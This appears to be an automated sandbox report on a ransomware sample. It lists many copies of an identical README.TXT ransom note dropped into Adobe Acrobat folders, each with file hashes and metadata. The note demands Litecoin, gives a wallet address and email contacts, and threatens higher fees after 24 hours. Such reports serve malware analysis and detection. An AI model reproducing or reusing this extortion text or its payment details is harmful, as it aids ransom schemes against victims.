                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ar-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
